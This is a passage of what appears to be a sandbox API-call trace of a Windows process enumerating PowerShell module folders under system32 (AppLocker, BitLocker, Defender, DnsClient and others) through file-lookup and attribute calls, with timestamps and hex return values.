ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.091] FindClose (in: hFindFile=0x1a899660 | out: hFindFile=0x1a899660) returned 1 [0332.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.095] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0332.095] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0332.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0332.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0332.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0332.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0332.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0332.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x45, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0332.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0332.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0332.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0332.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0332.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0332.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0332.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0332.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0332.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0332.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0332.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", lpFilePart=0x0) returned 0x3b [0332.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0332.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d8796d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0332.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", nBufferLength=0x48, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization", lpFilePart=0x0) returned 0x47 [0332.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\deliveryoptimization"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0332.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0332.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x38, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0332.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0332.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0332.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0332.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), 